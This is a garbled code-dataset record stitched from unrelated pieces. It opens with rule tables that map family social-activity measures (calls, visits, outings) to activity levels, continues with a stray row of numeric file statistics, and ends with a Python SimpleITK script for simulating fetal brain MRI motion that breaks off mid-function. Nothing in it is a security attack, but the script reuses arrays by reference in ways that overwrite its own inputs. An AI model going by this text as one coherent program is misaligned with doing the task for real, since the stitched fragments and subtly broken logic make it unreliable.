situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'medium'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'very high'}, 'very_high'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'decrease', together_outside_last_7_days:'decrease'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'decrease', together_outside_last_7_days:'stable'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'decrease', together_outside_last_7_days:'increase'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'stable', together_outside_last_7_days:'decrease'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'stable', together_outside_last_7_days:'stable'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'stable', together_outside_last_7_days:'increase'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'increase', together_outside_last_7_days:'decrease'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'increase', together_outside_last_7_days:'stable'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'decrease', visits_last_7_days:'increase', together_outside_last_7_days:'increase'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'decrease', together_outside_last_7_days:'decrease'}, 'high decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'decrease', together_outside_last_7_days:'stable'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'decrease', together_outside_last_7_days:'increase'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'stable', together_outside_last_7_days:'decrease'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'stable', together_outside_last_7_days:'stable'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'stable', together_outside_last_7_days:'increase'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'increase', together_outside_last_7_days:'decrease'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'increase', together_outside_last_7_days:'stable'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'increase', together_outside_last_7_days:'increase'}, 'high increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'decrease', together_outside_last_7_days:'decrease'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'decrease', together_outside_last_7_days:'stable'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'decrease', together_outside_last_7_days:'increase'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'stable', together_outside_last_7_days:'decrease'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'stable', together_outside_last_7_days:'stable'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'stable', together_outside_last_7_days:'increase'}, 'high increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'increase', together_outside_last_7_days:'decrease'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'increase', together_outside_last_7_days:'stable'}, 'high increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'increase', together_outside_last_7_days:'increase'}, 'high increase'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'decrease', feat_calls_duration_family_relative:'decrease'}, 'decrease'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'decrease', feat_calls_duration_family_relative:'stable'}, 'decrease'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'decrease', feat_calls_duration_family_relative:'increase'}, 'stable'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'stable', feat_calls_duration_family_relative:'decrease'}, 'decrease'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'stable', feat_calls_duration_family_relative:'stable'}, 'stable'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'stable', feat_calls_duration_family_relative:'increase'}, 'increase'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'increase', feat_calls_duration_family_relative:'decrease'}, 'stable'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'increase', feat_calls_duration_family_relative:'stable'}, 'increase'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'increase', feat_calls_duration_family_relative:'increase'}, 'increase'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'decrease', feat_visits_family_relative:'decrease'}, 'decrease'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'decrease', feat_visits_family_relative:'stable'}, 'stable'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'decrease', feat_visits_family_relative:'increase'}, 'increase'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'stable', feat_visits_family_relative:'decrease'}, 'decrease'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'stable', feat_visits_family_relative:'stable'}, 'stable'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'stable', feat_visits_family_relative:'increase'}, 'increase'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'increase', feat_visits_family_relative:'decrease'}, 'decrease'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'increase', feat_visits_family_relative:'stable'}, 'stable'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'increase', feat_visits_family_relative:'increase'}, 'increase'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'decrease', feat_outside_family_relative:'decrease'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'decrease', feat_outside_family_relative:'stable'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'decrease', feat_outside_family_relative:'increase'}, 'stable'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'stable', feat_outside_family_relative:'decrease'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'stable', feat_outside_family_relative:'stable'}, 'stable'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'stable', feat_outside_family_relative:'increase'}, 'increase'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'increase', feat_outside_family_relative:'decrease'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'increase', feat_outside_family_relative:'stable'}, 'stable'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'increase', feat_outside_family_relative:'increase'}, 'increase'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'low'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'medium'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'high'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'low'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'medium'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'high'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'low'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'medium'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'high'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'low'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'medium'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'high'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'low'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'medium'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'high'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'low'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'medium'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'high'}, 'very high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'low'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'medium'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'high'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'low'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'medium'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'high'}, 'very high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'low'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'medium'}, 'very high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'high'}, 'very high'])
| 112.705584 | 209 | 0.85511 | 2,995 | 22,203 | 5.722204 | 0.01803 | 0.131521 | 0.072471 | 0.109756 | 0.978002 | 0.96038 | 0.929455 | 0.882658 | 0.856168 | 0.837612 | 0 | 0.006475 | 0.026213 | 22,203 | 196 | 210 | 113.280612 | 0.78618 | 0.005315 | 0 | 0 | 1 | 0 | 0.14961 | 0.019318 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005556 | 0 | 0.005556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b5bc5996e7b66eaf531dd759ccfebf0041dae12a | 30,656 | py | Python | generateMotionFetal.py | amiralansary/simulate_fetal_motion | 1b04e4c4ad2fdf19dfcbf816314538b00e41f3f6 | [
"Apache-2.0"
] | null | null | null | generateMotionFetal.py | amiralansary/simulate_fetal_motion | 1b04e4c4ad2fdf19dfcbf816314538b00e41f3f6 | [
"Apache-2.0"
] | null | null | null | generateMotionFetal.py | amiralansary/simulate_fetal_motion | 1b04e4c4ad2fdf19dfcbf816314538b00e41f3f6 | [
"Apache-2.0"
] | null | null | null | # library path
import os, sys
lib_path = os.path.abspath('/vol/biomedic/users/aa16914/lib/python2.7/site-packages/')
sys.path.insert(1,lib_path)
lib_path = os.path.abspath('/vol/biomedic/users/aa16914/lib/SimpleITK/build/Wrapping/build/lib.linux-x86_64-2.7/SimpleITK/')
sys.path.insert(1,lib_path)
import SimpleITK as sitk
import numpy as np
import math as mt
def resample_sitk(img, newSpacing, shiftOrigin=(0,0,0), interpolator=sitk.sitkBSpline):
""" This function transforms a nifti image
Attributes:
img: The fixed image that will be transformed (simpleitk type)
newSpacing: The translation vector in mm [tx,ty,tz]
shiftOrigin: The rotation vector that contains the angels in degrees [ax+,ax-,ay+,ay-,az+,az-]
interpolator: The resampling filter interpolator. For gray images use sitk.sitkBSpline, and for binary images choose sitk.sitkNearestNeighbor
Return:
img_resampled: The resampled image
"""
T = sitk.Transform(3,sitk.sitkIdentity)
resizeFilter = sitk.ResampleImageFilter()
resizeFilter.SetTransform(T)
oldSize = img.GetSize()
oldSpacing = img.GetSpacing()
newSize = ( int(oldSize[0] * oldSpacing[0] / newSpacing[0]),
int(oldSize[1] * oldSpacing[1] / newSpacing[1]),
int(oldSize[2] * oldSpacing [2] / newSpacing[2]) )
oldOrigin = img.GetOrigin()
oldDirection = img.GetDirection()
newOrigin = [x + y for x, y in zip(oldOrigin, shiftOrigin)]
newDirection = oldDirection
resizeFilter.SetOutputDirection(newDirection)
resizeFilter.SetInterpolator(interpolator)
resizeFilter.SetOutputSpacing(newSpacing)
resizeFilter.SetOutputOrigin(newOrigin)
resizeFilter.SetDefaultPixelValue(0)
resizeFilter.SetSize(newSize)
# resizeFilter.DebugOn()
img_resampled = resizeFilter.Execute(img)
return img_resampled
def transform_affine_sitk(fixed_image_sitk,translation_vector=[0,0,0],rotation_vector=[0,0,0],scaling_vector=[1,1,1],interpolator=sitk.sitkBSpline,spacing=None):
""" This function transforms a nifti image
Attributes:
fixed_image_sitk: The fixed image that will be transformed (simpleitk type)
translation_vector: The translation vector in mm [tx,ty,tz]
rotation_angels: The rotation vector that contains the angels in degrees [Rx,Ry,Rz]
scaling_vector: The scaling vector [Sx,Sy,Sz]
interpolator: The resampling filter interpolator. For gray images use sitk.sitkBSpline, and for binary images choose sitk.sitkNearestNeighbor
Return:
moving_image_sitk: The moving image that has been transformed
"""
# DefaultPixelValue = fixed_image_sitk.GetPixel(0,0,0)
size = fixed_image_sitk.GetSize()
origin = fixed_image_sitk.GetOrigin()
direction = fixed_image_sitk.GetDirection()
if spacing is None:
spacing = fixed_image_sitk.GetSpacing()
dimension = 3
Trans = sitk.Transform(dimension, sitk.sitkAffine)
# Translation
tx, ty, tz = translation_vector/np.array(spacing)
dt = np.array([tx,ty,tz,1])
# Rotation
theta_x, theta_y, theta_z = (mt.pi/180)*np.array(rotation_vector)
Rx = np.array([
[1, 0, 0],
[0, mt.cos(theta_x), -mt.sin(theta_x)],
[0, mt.sin(theta_x), mt.cos(theta_x)]])
Ry = np.array([
[mt.cos(theta_y), 0, mt.sin(theta_y)],
[0, 1, 0],
[-mt.sin(theta_y), 0, mt.cos(theta_y)]])
Rz = np.array([
[mt.cos(theta_z), -mt.sin(theta_z), 0],
[mt.sin(theta_z), mt.cos(theta_z), 0],
[0, 0, 1]])
R = Rz.dot(Ry.dot(Rx.T).T)
# Scale
Sx, Sy, Sz = scaling_vector
R[0,0] = R[0,0]/Sx
R[1,1] = R[1,1]/Sy
R[2,2] = R[2,2]/Sz
# update transformation vector
trans_vector = np.concatenate((R.flatten(),dt),axis=0)
Trans.SetParameters(trans_vector)
# print(Trans)
# resample filter
resampleFilter = sitk.ResampleImageFilter()
resampleFilter.SetTransform(Trans)
resampleFilter.SetOutputDirection(direction)
resampleFilter.SetInterpolator(interpolator)
resampleFilter.SetOutputSpacing(spacing)
resampleFilter.SetOutputOrigin(origin)
resampleFilter.SetDefaultPixelValue(0)
resampleFilter.SetSize(size)
# transform the image
moving_image_sitk = resampleFilter.Execute(fixed_image_sitk)
return moving_image_sitk
def transform_skew_sitk(fixed_image_sitk, translation=(0,0,0), scale=(1,1,1), skew=(0,0,0,0,0,0), interpolator=sitk.sitkBSpline, spacing=None):
""" This function transforms a nifti image
Attributes:
fixed_image_sitk: The fixed image that will be transformed (simpleitk type)
translation: The translation vector in mm [tx,ty,tz]
skew: The rotation vector that contains the angels in degrees [ax+,ax-,ay+,ay-,az+,az-]
scale: The scaling vector [Sx,Sy,Sz]
interpolator: The resampling filter interpolator. For gray images use sitk.sitkBSpline, and for binary images choose sitk.sitkNearestNeighbor
Return:
moving_image_sitk: The moving image that has been transformed
"""
# DefaultPixelValue = fixed_image_sitk.GetPixel(0,0,0)
size = fixed_image_sitk.GetSize()
origin = fixed_image_sitk.GetOrigin()
direction = fixed_image_sitk.GetDirection()
if spacing is None:
spacing = fixed_image_sitk.GetSpacing()
dimension = 3
print skew
print np.array(skew)
skew = np.tan(np.radians(np.array(skew))) #six eqaully spaced values in[0,1], an arbitrary choice
versor = (0,0,0,1.0)
skewTransformer = sitk.ScaleSkewVersor3DTransform(scale, skew, versor, translation)
print skewTransformer
# resample filter
resampleFilter = sitk.ResampleImageFilter()
resampleFilter.SetTransform(skewTransformer)
resampleFilter.SetOutputDirection(direction)
resampleFilter.SetInterpolator(interpolator)
resampleFilter.SetOutputSpacing(spacing)
resampleFilter.SetOutputOrigin(origin)
resampleFilter.SetDefaultPixelValue(0)
resampleFilter.SetSize(size)
# transform the image
moving_image_sitk = resampleFilter.Execute(fixed_image_sitk)
return moving_image_sitk
def moveImages(fixed_image_sitk, shiftOrigin=(0,0,0), newSpacing=(1.,1.,1.), interpolator=sitk.sitkBSpline, translation_vector_1=[0,0,0], translation_vector_2=[0,0,0],
skew_vector_1=(0,0,0,0,0,0), skew_vector_2=(0,0,0,0,0,0), scaling_vector_1=(1,1,1), scaling_vector_2=(1,1,1)):
# reample image
fixed_image_sitk0 = resample_sitk(fixed_image_sitk, newSpacing=newSpacing, shiftOrigin=shiftOrigin, interpolator=interpolator)
fixed_image_sitk1 = resample_sitk(fixed_image_sitk, newSpacing=newSpacing, shiftOrigin=shiftOrigin, interpolator=interpolator)
fixed_image_sitk2 = resample_sitk(fixed_image_sitk, newSpacing=newSpacing, shiftOrigin=shiftOrigin, interpolator=interpolator)
# Transform image
moving_image_sitk0 = fixed_image_sitk0
moving_image_sitk1 = transform_skew_sitk(fixed_image_sitk1, translation=translation_vector_1, scale=scaling_vector_1, skew=skew_vector_1, interpolator=interpolator)
moving_image_sitk2 = transform_skew_sitk(fixed_image_sitk2, translation=translation_vector_2, scale=scaling_vector_2, skew=skew_vector_2, interpolator=interpolator)
moving_image0 = sitk.GetArrayFromImage(moving_image_sitk0)
moving_image1 = sitk.GetArrayFromImage(moving_image_sitk1)
moving_image2 = sitk.GetArrayFromImage(moving_image_sitk2)
return moving_image_sitk0, moving_image0, moving_image1, moving_image2
def main():
image_path = 'brain_img.nii.gz'
mask_path = 'brain_mask.nii.gz'
# read image
fixed_image_sitk = sitk.ReadImage(image_path)
fixed_mask_sitk = sitk.ReadImage(mask_path)
fixed_image_mask_sitk = sitk.Mask(fixed_image_sitk,fixed_mask_sitk)
# reample image
img_array = sitk.GetArrayFromImage(fixed_image_mask_sitk)
threshold_filter = sitk.BinaryThresholdImageFilter()
threshold_filter.SetLowerThreshold(1)
threshold_filter.SetUpperThreshold((int)(img_array.max()))
direction_ax = (
1.0, 0.0, 0.0,
0.0, 1.0, 0.0,
0.0, 0.0, 1.0)
direction_co = (
1.0, 0.0, 0.0,
0.0, 0.0, 1.0,
0.0, 1.0, 0.0)
direction_sa = (
0.0, 0.0, 1.0,
0.0, 1.0, 0.0,
1.0, 0.0, 0.0)
img_ax = img_array.copy()
img_ax_sitk = sitk.GetImageFromArray(img_ax)
img_ax_sitk.SetDirection(direction_ax)
sitk.WriteImage(img_ax_sitk,'img_ax.nii.gz')
img_ax_mask = threshold_filter.Execute(img_ax_sitk)
sitk.WriteImage(img_ax_mask,'img_ax_mask.nii.gz')
img_co = np.swapaxes(img_array,0,1)
img_co_sitk = sitk.GetImageFromArray(img_co)
img_co_sitk.SetDirection(direction_co)
sitk.WriteImage(img_co_sitk,'img_co.nii.gz')
img_co_mask = threshold_filter.Execute(img_co_sitk)
sitk.WriteImage(img_co_mask,'img_co_mask.nii.gz')
img_sa = np.swapaxes(img_array,0,2)
img_sa_sitk = sitk.GetImageFromArray(img_sa)
img_sa_sitk.SetDirection(direction_sa)
sitk.WriteImage(img_sa_sitk,'img_sa.nii.gz')
img_sa_mask = threshold_filter.Execute(img_sa_sitk)
sitk.WriteImage(img_sa_mask,'img_sa_mask.nii.gz')
# # randomize transformation parameters
# translation_vector = np.random.choice(range(-4,4),3) # random translations between [-4,4] mm
# rotation_vector = np.random.choice(range(-10,10),3) # random rotation angels between [-10,10] degrees
skew_unit_vector = (1,1,1,1,1,1)
# first transformation parameters
skew_vector_1 = [1*x for x in skew_unit_vector]
scaling_vector_1 = (1,1,1)
translation_vector_1 = (0,0,0) # translate x mm in x,y,z
rotation_vector_1 = (0,0,0) # rotate x degrees in x,y,z
# first transformation parameters
# skew_unit_vector = (0,0,0,1,0,0)
skew_vector_2 = [-1*x for x in skew_unit_vector]
scaling_vector_2 = (1,1,1)
translation_vector_2 = (0,0,0) # translate x mm in x,y,z
rotation_vector_2 = (0,0,0) # rotate x degrees in x,y,z
################################################################################################################################################
## ---------------------------------------------------- Axial Image ------------------------------------------------------------------------- ##
################################################################################################################################################
# axial-1 (a1) [0,1,2]
newSpacing = (1.5,1.5,3)
shiftOrigin = (0,0,0)
moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_ax_sitk, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_ax_mask, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
end = moving_image0.shape[0]
sitk.WriteImage(moving_image_sitk0,'moving_img_a1.nii.gz')
# sample slices -------------------------------------------------------------------------
moving_mask = moving_mask0
moving_mask[range(0,end,3)] = moving_mask0[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask1[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask2[range(2,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_a1.nii.gz")
moving_image = moving_image0
moving_image[range(0,end,3)] = moving_image0[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image1[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image2[range(2,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"img_a1.nii.gz")
sitk.WriteImage(moving_image_sitk_final,"moving_image_a1.nii.gz")
moving_image_sitk_final1 = sitk.GetImageFromArray(moving_image1)
moving_image_sitk_final1.CopyInformation(moving_image_sitk0)
sitk.WriteImage(moving_image_sitk_final1,"img_a2.nii.gz")
moving_image_sitk_final2 = sitk.GetImageFromArray(moving_image2)
moving_image_sitk_final2.CopyInformation(moving_image_sitk0)
sitk.WriteImage(moving_image_sitk_final2,"img_a3.nii.gz")
# # axial-2 (a2) [2,1,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_ax_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_ax_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[0]
moving_mask = moving_mask0
moving_mask[range(2,end,3)] = moving_mask0[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask1[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask2[range(1,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_a2.nii.gz")
moving_image = moving_image0
moving_image[range(2,end,3)] = moving_image0[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image1[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image2[range(1,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_a2.nii.gz")
# # axial-3 (a3) [1,2,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_ax_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_ax_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[0]
moving_mask = moving_mask0
moving_mask[range(1,end,3)] = moving_mask0[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask1[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask2[range(0,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_a3.nii.gz")
moving_image = moving_image0
moving_image[range(1,end,3)] = moving_image0[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image1[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image2[range(0,end,3)]
moving_image[moving_image<0] = 0
